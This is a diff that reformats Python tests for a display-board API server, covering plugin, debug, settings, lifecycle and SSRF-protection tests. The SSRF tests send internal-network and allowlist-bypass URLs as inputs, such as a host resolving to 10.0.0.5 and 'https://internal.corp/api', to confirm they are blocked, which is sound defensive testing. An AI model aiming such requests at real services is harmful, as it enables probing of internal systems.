+        ):
             reg = Mock()
             reg.get_plugin.return_value = Mock()
             reg.enable_plugin.return_value = True
@@ -311,11 +316,13 @@ class TestPluginEnableDisableAPI:
 
     def test_disable_plugin_success_returns_correct_shape(self, client):
         """POST /plugins/{id}/disable for known plugin returns success shape."""
-        with patch("src.api_server.get_plugin_registry") as mock_reg_get, \
-             patch("src.api_server.get_config_manager") as mock_cm_get, \
-             patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with (
+            patch("src.api_server.get_plugin_registry") as mock_reg_get,
+            patch("src.api_server.get_config_manager") as mock_cm_get,
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.reset_display_service"),
+            patch("src.api_server.reset_template_engine"),
+        ):
             reg = Mock()
             reg.get_plugin.return_value = Mock()
             reg.disable_plugin.return_value = True
@@ -331,8 +338,10 @@ class TestPluginEnableDisableAPI:
 
     def test_enable_plugin_registry_failure_returns_400(self, client):
         """POST /plugins/{id}/enable when registry returns False gives 400."""
-        with patch("src.api_server.get_plugin_registry") as mock_reg_get, \
-             patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
+        with (
+            patch("src.api_server.get_plugin_registry") as mock_reg_get,
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+        ):
             reg = Mock()
             reg.get_plugin.return_value = Mock()
             reg.enable_plugin.return_value = False
@@ -346,6 +355,7 @@ class TestPluginEnableDisableAPI:
 # Debug Endpoint Shape Tests
 # ===========================================================================
 
+
 class TestDebugEndpoints:
     """Tests that debug endpoints return expected shapes without exposing secrets."""
 
@@ -354,19 +364,26 @@ class TestDebugEndpoints:
         mock_ts_instance = Mock()
         mock_ts_instance.create_utc_timestamp.return_value = "2026-03-22T00:00:00Z"
 
-        with patch("src.api_server._get_server_ip", return_value="192.0.2.1"), \
-             patch("src.api_server._get_service_uptime", return_value=3600.0), \
-             patch("src.api_server._format_uptime", return_value="1h 0m"), \
-             patch("src.api_server._get_board_client", return_value=None), \
-             patch("src.time_service.get_time_service", return_value=mock_ts_instance):
-
+        with (
+            patch("src.api_server._get_server_ip", return_value="192.0.2.1"),
+            patch("src.api_server._get_service_uptime", return_value=3600.0),
+            patch("src.api_server._format_uptime", return_value="1h 0m"),
+            patch("src.api_server._get_board_client", return_value=None),
+            patch("src.time_service.get_time_service", return_value=mock_ts_instance),
+        ):
             response = client.get("/debug/system-info")
 
         assert response.status_code == 200
         data = response.json()
         expected_keys = {
-            "board_ip", "server_ip", "uptime_seconds", "uptime_formatted",
-            "connection_mode", "version", "timestamp", "board_configured",
+            "board_ip",
+            "server_ip",
+            "uptime_seconds",
+            "uptime_formatted",
+            "connection_mode",
+            "version",
+            "timestamp",
+            "board_configured",
             "service_running",
         }
         missing = expected_keys - set(data.keys())
@@ -377,12 +394,13 @@ class TestDebugEndpoints:
         mock_ts_instance = Mock()
         mock_ts_instance.create_utc_timestamp.return_value = "2026-03-22T00:00:00Z"
 
-        with patch("src.api_server._get_server_ip", return_value="192.0.2.1"), \
-             patch("src.api_server._get_service_uptime", return_value=0.0), \
-             patch("src.api_server._format_uptime", return_value="0m"), \
-             patch("src.api_server._get_board_client", return_value=None), \
-             patch("src.time_service.get_time_service", return_value=mock_ts_instance):
-
+        with (
+            patch("src.api_server._get_server_ip", return_value="192.0.2.1"),
+            patch("src.api_server._get_service_uptime", return_value=0.0),
+            patch("src.api_server._format_uptime", return_value="0m"),
+            patch("src.api_server._get_board_client", return_value=None),
+            patch("src.time_service.get_time_service", return_value=mock_ts_instance),
+        ):
             response = client.get("/debug/system-info")
 
         body = response.text
@@ -395,13 +413,16 @@ class TestDebugEndpoints:
 # Config Boundary (Rate-Limit Bypass) Tests
 # ===========================================================================
 
+
 class TestRefreshSecondsBypass:
     """Tests that the API rejects refresh_seconds values below the manifest minimum."""
 
     def test_put_config_with_below_minimum_refresh_returns_400(self, client):
         """PUT /plugins/{id}/config with refresh_seconds below minimum returns 400."""
-        with patch("src.api_server.get_plugin_registry") as mock_reg_get, \
-             patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
+        with (
+            patch("src.api_server.get_plugin_registry") as mock_reg_get,
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+        ):
             reg = Mock()
             reg.get_plugin.return_value = Mock()
             reg.set_plugin_config.return_value = ["Refresh interval must be at least 30 seconds"]
@@ -417,11 +438,13 @@ class TestRefreshSecondsBypass:
 
     def test_put_config_with_valid_refresh_succeeds(self, client):
         """PUT /plugins/{id}/config with valid refresh_seconds returns 200."""
-        with patch("src.api_server.get_plugin_registry") as mock_reg_get, \
-             patch("src.api_server.get_config_manager") as mock_cm_get, \
-             patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with (
+            patch("src.api_server.get_plugin_registry") as mock_reg_get,
+            patch("src.api_server.get_config_manager") as mock_cm_get,
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.reset_display_service"),
+            patch("src.api_server.reset_template_engine"),
+        ):
             reg = Mock()
             reg.get_plugin.return_value = Mock()
             reg.set_plugin_config.return_value = []
@@ -443,6 +466,7 @@ class TestRefreshSecondsBypass:
 # SSRF Protection Tests
 # ===========================================================================
 
+
 class TestSSRFProtection:
     """Tests that _validate_request_url blocks SSRF targets via /generic-data/test-fetch."""
 
@@ -458,8 +482,10 @@ class TestSSRFProtection:
         return cm
 
     def _post(self, client, url: str, mock_cm):
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+        ):
             return client.post("/generic-data/test-fetch", json={"url": url})
 
     # --- Blocked: non-http(s) schemes ---
@@ -530,9 +556,11 @@ class TestSSRFProtection:
 
     def test_rejects_domain_resolving_to_private_ip(self, client, mock_cm):
         private_addr_info = _make_addr_info("10.0.0.5", 80)
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("socket.getaddrinfo", return_value=private_addr_info):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("socket.getaddrinfo", return_value=private_addr_info),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://internal.corp/api"})
         assert resp.status_code == 400
 
@@ -540,9 +568,12 @@ class TestSSRFProtection:
 
     def test_rejects_unresolvable_domain(self, client, mock_cm):
         import socket
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("socket.getaddrinfo", side_effect=socket.gaierror("no such host")):
+
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("socket.getaddrinfo", side_effect=socket.gaierror("no such host")),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://no-such-host.invalid/api"})
         assert resp.status_code == 400
 
@@ -553,10 +584,12 @@ class TestSSRFProtection:
         mock_resp.raise_for_status.return_value = None
         mock_resp.content = b'{"ok": true}'
         mock_resp.json.return_value = {"ok": True}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["93.184.216.34"]), \
-             patch("requests.request", return_value=mock_resp):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["93.184.216.34"]),
+            patch("requests.request", return_value=mock_resp),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://93.184.216.34/api"})
         assert resp.status_code == 200
 
@@ -565,11 +598,13 @@ class TestSSRFProtection:
         mock_resp.raise_for_status.return_value = None
         mock_resp.content = b'{"ok": true}'
         mock_resp.json.return_value = {"ok": True}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", return_value=mock_resp):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", return_value=mock_resp),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/data"})
         assert resp.status_code == 200
 
@@ -579,20 +614,24 @@ class TestSSRFProtection:
         mock_resp.raise_for_status.return_value = None
         mock_resp.content = b'{"ok": true}'
         mock_resp.json.return_value = {"ok": True}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=[]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", return_value=mock_resp):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=[]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", return_value=mock_resp),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/data"})
         assert resp.status_code == 200
 
     def test_rejects_host_not_in_allowlist(self, client, mock_cm):
         """When GENERIC_DATA_ALLOWED_HOSTS is set, hosts outside the list are rejected."""
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["myapi.com"]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["myapi.com"]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/data"})
         assert resp.status_code == 400
         assert "allowlist" in resp.json()["detail"]

--- a/tests/test_security.py
+++ b/tests/test_security.py
@@ -156,7 +156,7 @@ class TestSensitiveDataMasking:
 
     def test_get_plugin_masks_api_key(self, client, mock_plugin_with_sensitive_config):
         """GET /plugins/{id} must not return the raw api_key value."""
-        reg, cm = mock_plugin_with_sensitive_config
+        _reg, _cm = mock_plugin_with_sensitive_config
         response = client.get("/plugins/test_plugin")
         assert response.status_code == 200
         data = response.json()
@@ -169,7 +169,7 @@ class TestSensitiveDataMasking:
 
     def test_mask_sensitive_called_on_plugin_get(self, client, mock_plugin_with_sensitive_config):
         """Verify that _mask_sensitive() is called when returning plugin config."""
-        reg, cm = mock_plugin_with_sensitive_config
+        _reg, cm = mock_plugin_with_sensitive_config
         client.get("/plugins/test_plugin")
         cm._mask_sensitive.assert_called()
 

--- a/tests/test_service_lifecycle.py
+++ b/tests/test_service_lifecycle.py
@@ -7,9 +7,9 @@ Covers:
 - /health and /status API endpoints
 """
 
-import time
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 
@@ -18,10 +18,12 @@ class TestDisplayServiceRun:
 
     @pytest.fixture
     def service(self):
-        with patch('src.main.Config') as mock_config, \
-             patch('src.main.get_settings_service') as mock_settings, \
-             patch('src.main.get_page_service'), \
-             patch('src.main.get_schedule_service'):
+        with (
+            patch("src.main.Config") as mock_config,
+            patch("src.main.get_settings_service") as mock_settings,
+            patch("src.main.get_page_service"),
+            patch("src.main.get_schedule_service"),
+        ):
             mock_config.validate.return_value = True
             mock_config.get_summary.return_value = {}
             mock_config.get_transition_settings.return_value = {"strategy": None}
@@ -29,6 +31,7 @@ class TestDisplayServiceRun:
             mock_settings_inst.get_polling_interval.return_value = 60
             mock_settings.return_value = mock_settings_inst
             from src.main import DisplayService
+
             svc = DisplayService()
             yield svc
 
@@ -36,7 +39,7 @@ class TestDisplayServiceRun:
         """run() must return cleanly when initialization fails, never call sys.exit."""
         service.vb_client = None
 
-        with patch.object(service, 'initialize', return_value=False):
+        with patch.object(service, "initialize", return_value=False):
             service.run()
 
         assert not service.running or service.running is True
@@ -45,7 +48,7 @@ class TestDisplayServiceRun:
         """run() must not raise SystemExit on initialization failure."""
         service.vb_client = None
 
-        with patch.object(service, 'initialize', return_value=False):
+        with patch.object(service, "initialize", return_value=False):
             try:
                 service.run()
             except SystemExit:
@@ -56,16 +59,19 @@ class TestDisplayServiceRun:
         service.vb_client = Mock()
         service.running = True
 
-        with patch.object(service, 'initialize') as mock_init, \
-             patch('src.main.schedule') as mock_schedule, \
-             patch.object(service, 'check_and_send_active_page'):
+        with (
+            patch.object(service, "initialize") as mock_init,
+            patch("src.main.schedule") as mock_schedule,
+            patch.object(service, "check_and_send_active_page"),
+        ):
             mock_schedule.run_pending.return_value = None
 
             def stop_after_one(*_args, **_kwargs):
                 service.running = False
+
             mock_schedule.run_pending.side_effect = stop_after_one
 
-            with patch('src.main.get_settings_service') as mock_ss:
+            with patch("src.main.get_settings_service") as mock_ss:
                 mock_ss.return_value.get_polling_interval.return_value = 60
                 service.run()
 
@@ -75,7 +81,7 @@ class TestDisplayServiceRun:
         """run() calls initialize() when vb_client is None."""
         service.vb_client = None
 
-        with patch.object(service, 'initialize', return_value=False) as mock_init:
+        with patch.object(service, "initialize", return_value=False) as mock_init:
             service.run()
 
         mock_init.assert_called_once()
@@ -87,6 +93,7 @@ class TestRunServiceBackground:
     def _reset_api_globals(self):
         """Reset api_server module globals to a clean state."""
         import src.api_server as api
+
         api._service_running = False
         api._shutting_down = False
         api._service = None
@@ -96,6 +103,7 @@ class TestRunServiceBackground:
     def test_catches_base_exception_and_continues(self):
         """BaseException from service.run() must not kill the restart loop."""
         import src.api_server as api
+
         self._reset_api_globals()
 
         mock_service = Mock()
@@ -113,7 +121,7 @@ class TestRunServiceBackground:
 
         mock_service.run.side_effect = run_side_effect
 
-        with patch('src.api_server.get_service', return_value=mock_service):
+        with patch("src.api_server.get_service", return_value=mock_service):
             api.run_service_background()
 
         assert call_count == 2, "Service should have been called twice (crash + restart)"
@@ -121,6 +129,7 @@ class TestRunServiceBackground:
     def test_catches_keyboard_interrupt_and_continues(self):
         """KeyboardInterrupt from service.run() must not kill the restart loop."""
         import src.api_server as api
+
         self._reset_api_globals()
 
         mock_service = Mock()
@@ -137,7 +146,7 @@ class TestRunServiceBackground:
 
         mock_service.run.side_effect = run_side_effect
 
-        with patch('src.api_server.get_service', return_value=mock_service):
+        with patch("src.api_server.get_service", return_value=mock_service):
             api.run_service_background()
 
         assert call_count == 2
@@ -145,6 +154,7 @@ class TestRunServiceBackground:
     def test_sets_service_running_false_on_exit(self):
         """_service_running must be False after service.run() exits."""
         import src.api_server as api
+
         self._reset_api_globals()
 
         mock_service = Mock()
@@ -155,7 +165,7 @@ class TestRunServiceBackground:
 
         mock_service.run.side_effect = run_then_stop
 
-        with patch('src.api_server.get_service', return_value=mock_service):
+        with patch("src.api_server.get_service", return_value=mock_service):
             api.run_service_background()
 
         assert api._service_running is False
@@ -163,6 +173,7 @@ class TestRunServiceBackground:
     def test_exponential_backoff_on_repeated_failure(self):
         """Restart delay should increase with repeated failures."""
         import src.api_server as api
+
         self._reset_api_globals()
 
         mock_service = Mock()
@@ -180,13 +191,13 @@ class TestRunServiceBackground:
 
         mock_service.run.side_effect = run_side_effect
 
-        original_sleep = time.sleep
-
         def mock_sleep(seconds):
             sleep_calls.append(seconds)
 
-        with patch('src.api_server.get_service', return_value=mock_service), \
-             patch('src.api_server.time.sleep', side_effect=mock_sleep):
+        with (
+            patch("src.api_server.get_service", return_value=mock_service),
+            patch("src.api_server.time.sleep", side_effect=mock_sleep),
+        ):
             api.run_service_background()
 
         assert len(sleep_calls) >= 2
@@ -199,11 +210,12 @@ class TestHealthEndpoint:
     @pytest.fixture
     def client(self):
         from src.api_server import app
+
         return TestClient(app, raise_server_exceptions=False)
 
     def test_health_returns_ok(self, client):
         mock_service = Mock()
-        with patch('src.api_server.get_service', return_value=mock_service):
+        with patch("src.api_server.get_service", return_value=mock_service):
             response = client.get("/health")
 
         assert response.status_code == 200
@@ -214,16 +226,17 @@ class TestHealthEndpoint:
 
     def test_health_head_returns_ok(self, client):
         mock_service = Mock()
-        with patch('src.api_server.get_service', return_value=mock_service):
+        with patch("src.api_server.get_service", return_value=mock_service):
             response = client.head("/health")
 
         assert response.status_code == 200
 
     def test_health_reflects_service_running_state(self, client):
         import src.api_server as api
+
         mock_service = Mock()
 
-        with patch('src.api_server.get_service', return_value=mock_service):
+        with patch("src.api_server.get_service", return_value=mock_service):
             api._service_running = True
             response = client.get("/health")
             assert response.json()["service_running"] is True
@@ -241,6 +254,7 @@ class TestStatusEndpoint:
     @pytest.fixture
     def client(self):
         from src.api_server import app
+
         return TestClient(app, raise_server_exceptions=False)
 
     def test_status_returns_running_state(self, client):
@@ -250,9 +264,11 @@ class TestStatusEndpoint:
         mock_settings = Mock()
         mock_settings.get_active_page_id.return_value = "page1"
 
-        with patch('src.api_server.get_service', return_value=mock_service), \
-             patch('src.api_server.get_settings_service', return_value=mock_settings), \
-             patch('src.api_server.Config') as mock_config:
+        with (
+            patch("src.api_server.get_service", return_value=mock_service),
+            patch("src.api_server.get_settings_service", return_value=mock_settings),
+            patch("src.api_server.Config") as mock_config,
+        ):
             mock_config.get_summary.return_value = {}
 
             api._service_running = True
@@ -268,7 +284,7 @@ class TestStatusEndpoint:
             api._service_running = False
 
     def test_status_503_when_no_service(self, client):
-        with patch('src.api_server.get_service', return_value=None):
+        with patch("src.api_server.get_service", return_value=None):
             response = client.get("/status")
             assert response.status_code == 503
 
@@ -279,24 +295,25 @@ class TestVersionEndpoint:
     @pytest.fixture
     def client(self):
         from src.api_server import app
+
         return TestClient(app, raise_server_exceptions=False)
 
     def test_version_is_dev_when_no_env_vars(self, client):
-        with patch.dict('os.environ', {'VERSION': 'dev', 'PRODUCTION': 'false'}):
+        with patch.dict("os.environ", {"VERSION": "dev", "PRODUCTION": "false"}):
             response = client.get("/version")
         assert response.status_code == 200
         data = response.json()
         assert data["is_dev"] is True
 
     def test_version_is_not_dev_when_production_true(self, client):
-        with patch.dict('os.environ', {'PRODUCTION': 'true', 'VERSION': 'dev'}):
+        with patch.dict("os.environ", {"PRODUCTION": "true", "VERSION": "dev"}):
             response = client.get("/version")
         assert response.status_code == 200
         data = response.json()
         assert data["is_dev"] is False
 
     def test_version_is_not_dev_when_version_set(self, client):
-        with patch.dict('os.environ', {'VERSION': '1.2.3', 'PRODUCTION': 'false'}):
+        with patch.dict("os.environ", {"VERSION": "1.2.3", "PRODUCTION": "false"}):
             response = client.get("/version")
         assert response.status_code == 200
         data = response.json()

--- a/tests/test_settings_all.py
+++ b/tests/test_settings_all.py
@@ -1,5 +1,7 @@
 """Tests for consolidated settings endpoint."""
+
 from fastapi.testclient import TestClient
+
 from src.api_server import app
 
 client = TestClient(app)
@@ -8,10 +10,10 @@ client = TestClient(app)
 def test_settings_all_success():
     """Test successful retrieval of all settings."""
     response = client.get("/settings/all")
-    
+
     assert response.status_code == 200
     data = response.json()
-    
+
     # Check all required keys are present
     assert "general" in data
     assert "silence_schedule" in data
@@ -26,7 +28,7 @@ def test_settings_all_general_structure():
     """Test general settings structure."""
     response = client.get("/settings/all")
     data = response.json()
-    
+
     general = data["general"]
     assert isinstance(general, dict)
     assert "timezone" in general
@@ -37,7 +39,7 @@ def test_settings_all_polling_structure():
     """Test polling settings structure."""
     response = client.get("/settings/all")
     data = response.json()
-    
+
     polling = data["polling"]
     assert isinstance(polling, dict)
     assert "interval_seconds" in polling
@@ -49,7 +51,7 @@ def test_settings_all_transitions_structure():
     """Test transitions settings structure."""
     response = client.get("/settings/all")
     data = response.json()
-    
+
     transitions = data["transitions"]
     assert isinstance(transitions, dict)
     # Transitions may have strategy, step_interval_ms, step_size
@@ -60,7 +62,7 @@ def test_settings_all_output_structure():
     """Test output settings structure."""
     response = client.get("/settings/all")
     data = response.json()
-    
+
     output = data["output"]
     assert isinstance(output, dict)
     assert "target" in output
@@ -71,7 +73,7 @@ def test_settings_all_board_structure():
     """Test board settings structure."""
     response = client.get("/settings/all")
     data = response.json()
-    
+
     board = data["board"]
     assert isinstance(board, dict)
     assert "board_type" in board
@@ -82,7 +84,7 @@ def test_settings_all_status_structure():
     """Test status structure."""
     response = client.get("/settings/all")
     data = response.json()
-    
+
     status = data["status"]
     assert isinstance(status, dict)
     assert "running" in status
@@ -115,11 +117,11 @@ def test_settings_all_consistency():
     # Get all settings
     all_response = client.get("/settings/all")
     all_data = all_response.json()
-    
+
     # Get individual polling settings
     polling_response = client.get("/settings/polling")
     polling_data = polling_response.json()
-    
+
     # They should match
     assert all_data["polling"]["interval_seconds"] == polling_data["interval_seconds"]
 
@@ -129,11 +131,11 @@ def test_settings_all_board_consistency():
     # Get all settings
     all_response = client.get("/settings/all")
     all_data = all_response.json()
-    
+
     # Get individual board settings
     board_response = client.get("/settings/board")
     board_data = board_response.json()
-    
+
     # They should match
     assert all_data["board"]["board_type"] == board_data["board_type"]
 
@@ -141,11 +143,11 @@ def test_settings_all_board_consistency():
 def test_settings_all_response_time():
     """Test that consolidated endpoint is reasonably fast."""
     import time
-    
+
     start = time.time()
     response = client.get("/settings/all")
     duration = time.time() - start
-    
+
     assert response.status_code == 200
     # Should respond in less than 1 second
     assert duration < 1.0

--- a/tests/test_settings_beta.py
+++ b/tests/test_settings_beta.py
@@ -18,8 +18,10 @@ def _reset_beta_state():
 
 def test_get_beta_settings_returns_defaults():
     _reset_beta_state()
-    with patch("src.api_server._updater_token", return_value=""), \
-            patch("src.api_server._updater_probe", return_value=False):
+    with (
+        patch("src.api_server._updater_token", return_value=""),
+        patch("src.api_server._updater_probe", return_value=False),
+    ):
         response = client.get("/settings/beta")
     assert response.status_code == 200
     body = response.json()
@@ -42,9 +44,11 @@ def test_put_beta_enable_https_generates_cert_and_requests_restart(tmp_path, mon
         fake_key.write_text("KEY")
         return fake_cert, fake_key
 
-    with patch("src.system.https_certs.generate_cert", side_effect=fake_generate) as gen, \
-            patch("src.api_server._updater_token", return_value=""), \
-            patch("src.api_server._updater_probe", return_value=False):
+    with (
+        patch("src.system.https_certs.generate_cert", side_effect=fake_generate) as gen,
+        patch("src.api_server._updater_token", return_value=""),
+        patch("src.api_server._updater_probe", return_value=False),
+    ):
         response = client.put("/settings/beta", json={"https_enabled": True})
 
     assert response.status_code == 200
@@ -61,14 +65,18 @@ def test_put_beta_disable_https_removes_cert(tmp_path, monkeypatch):
     monkeypatch.setenv("FIESTABOARD_CERT_DIR", str(tmp_path))
 
     # Pre-enable without invoking openssl.
-    with patch("src.system.https_certs.generate_cert", return_value=(tmp_path / "c", tmp_path / "k")), \
-            patch("src.api_server._updater_token", return_value=""), \
-            patch("src.api_server._updater_probe", return_value=False):
+    with (
+        patch("src.system.https_certs.generate_cert", return_value=(tmp_path / "c", tmp_path / "k")),
+        patch("src.api_server._updater_token", return_value=""),
+        patch("src.api_server._updater_probe", return_value=False),
+    ):
         client.put("/settings/beta", json={"https_enabled": True})
 
-    with patch("src.system.https_certs.remove_cert", return_value=True) as rm, \
-            patch("src.api_server._updater_token", return_value=""), \
-            patch("src.api_server._updater_probe", return_value=False):
+    with (
+        patch("src.system.https_certs.remove_cert", return_value=True) as rm,
+        patch("src.api_server._updater_token", return_value=""),
+        patch("src.api_server._updater_probe", return_value=False),
+    ):
         response = client.put("/settings/beta", json={"https_enabled": False})
 
     assert response.status_code == 200
@@ -82,12 +90,13 @@ def test_put_beta_no_change_does_not_request_restart(tmp_path, monkeypatch):
     _reset_beta_state()
     monkeypatch.setenv("FIESTABOARD_CERT_DIR", str(tmp_path))
 
-    with patch("src.api_server._updater_token", return_value=""), \
-            patch("src.api_server._updater_probe", return_value=False):
+    with (
+        patch("src.api_server._updater_token", return_value=""),
+        patch("src.api_server._updater_probe", return_value=False),
+    ):
         # Setting to current value should not request a restart and
         # should not invoke cert generation.
-        with patch("src.system.https_certs.generate_cert") as gen, \
-                patch("src.system.https_certs.remove_cert") as rm:
+        with patch("src.system.https_certs.generate_cert") as gen, patch("src.system.https_certs.remove_cert") as rm:
             response = client.put("/settings/beta", json={"https_enabled": False})
 
     assert response.status_code == 200
@@ -101,11 +110,14 @@ def test_put_beta_cert_generation_failure_returns_warning(tmp_path, monkeypatch)
     _reset_beta_state()
     monkeypatch.setenv("FIESTABOARD_CERT_DIR", str(tmp_path))
 
-    with patch(
-        "src.system.https_certs.generate_cert",
-        side_effect=RuntimeError("openssl exploded"),
-    ), patch("src.api_server._updater_token", return_value=""), \
-            patch("src.api_server._updater_probe", return_value=False):
+    with (
+        patch(
+            "src.system.https_certs.generate_cert",
+            side_effect=RuntimeError("openssl exploded"),
+        ),
+        patch("src.api_server._updater_token", return_value=""),
+        patch("src.api_server._updater_probe", return_value=False),
+    ):
         response = client.put("/settings/beta", json={"https_enabled": True})
 
     assert response.status_code == 200
@@ -120,8 +132,10 @@ def test_put_beta_cert_generation_failure_returns_warning(tmp_path, monkeypatch)
 
 def test_put_beta_reports_updater_availability():
     _reset_beta_state()
-    with patch("src.api_server._updater_token", return_value="tok"), \
-            patch("src.api_server._updater_probe", return_value=True):
+    with (
+        patch("src.api_server._updater_token", return_value="tok"),
+        patch("src.api_server._updater_probe", return_value=True),
+    ):
         response = client.put("/settings/beta", json={})
     body = response.json()
     assert body["https"]["updater_available"] is True

--- a/tests/test_settings_plugins.py
+++ b/tests/test_settings_plugins.py
@@ -20,6 +20,7 @@ def _reset_plugin_settings():
 # PluginSettings dataclass
 # ---------------------------------------------------------------------------
 
+
 class TestPluginSettingsDataclass:
     def test_defaults(self):
         s = PluginSettings()
@@ -54,6 +55,7 @@ class TestPluginSettingsDataclass:
 # GET /settings/plugins
 # ---------------------------------------------------------------------------
 
+
 class TestGetPluginSettings:
     def setup_method(self):
         _reset_plugin_settings()
@@ -77,6 +79,7 @@ class TestGetPluginSettings:
 # ---------------------------------------------------------------------------
 # PUT /settings/plugins
 # ---------------------------------------------------------------------------
+
 
 class TestPutPluginSettings:
     def setup_method(self):
@@ -109,6 +112,7 @@ class TestPutPluginSettings:
 # /settings/all includes plugins section
 # ---------------------------------------------------------------------------
 
+
 def test_settings_all_includes_plugins_section():
     _reset_plugin_settings()
     response = client.get("/settings/all")
@@ -116,6 +120,7 @@ def test_settings_all_includes_plugins_section():
     data = response.json()
     assert "plugins" in data
     assert "auto_update" in data["plugins"]
+
 
 def test_settings_all_plugins_consistent_with_dedicated_endpoint():
     _reset_plugin_settings()
@@ -127,6 +132,7 @@ def test_settings_all_plugins_consistent_with_dedicated_endpoint():
 # ---------------------------------------------------------------------------
 # _auto_apply_plugin_updates helper
 # ---------------------------------------------------------------------------
+
 
 def _make_registry(plugin_ids, local_path_exists=True, has_git=True):
     """Build a minimal mock registry for _auto_apply_plugin_updates tests."""
@@ -160,8 +166,10 @@ def test_auto_apply_updates_external_plugin(tmp_path):
     registry.reload_plugin.return_value = MagicMock()
     registry._update_status = {plugin_id: True}
 
-    with patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path), \
-         patch("src.plugins.sources.clone_or_update_repo", return_value=(True, "")) as mock_clone:
+    with (
+        patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path),
+        patch("src.plugins.sources.clone_or_update_repo", return_value=(True, "")) as mock_clone,
+    ):
         asyncio.run(_auto_apply_plugin_updates(registry, [plugin_id]))
 
     mock_clone.assert_called_once_with("", plugin_id, external_dir=tmp_path)
@@ -228,8 +236,10 @@ def test_auto_apply_handles_git_fetch_failure(tmp_path):
     registry.get_plugin_source.return_value = source
     registry._update_status = {plugin_id: True}
 
-    with patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path), \
-         patch("src.plugins.sources.clone_or_update_repo", return_value=(False, "network error")):
+    with (
+        patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path),
+        patch("src.plugins.sources.clone_or_update_repo", return_value=(False, "network error")),
+    ):
         asyncio.run(_auto_apply_plugin_updates(registry, [plugin_id]))
 
     registry.reload_plugin.assert_not_called()
@@ -249,8 +259,10 @@ def test_auto_apply_handles_reload_failure(tmp_path):
     registry.reload_plugin.return_value = None  # reload failed
     registry._update_status = {plugin_id: True}
 
-    with patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path), \
-         patch("src.plugins.sources.clone_or_update_repo", return_value=(True, "")):
+    with (
+        patch("src.plugins.sources.get_external_plugins_dir", return_value=tmp_path),
+        patch("src.plugins.sources.clone_or_update_repo", return_value=(True, "")),
+    ):
         asyncio.run(_auto_apply_plugin_updates(registry, [plugin_id]))
 
     assert registry._update_status[plugin_id] is True
@@ -282,8 +294,10 @@ def test_auto_apply_multiple_plugins_partial_success(tmp_path):
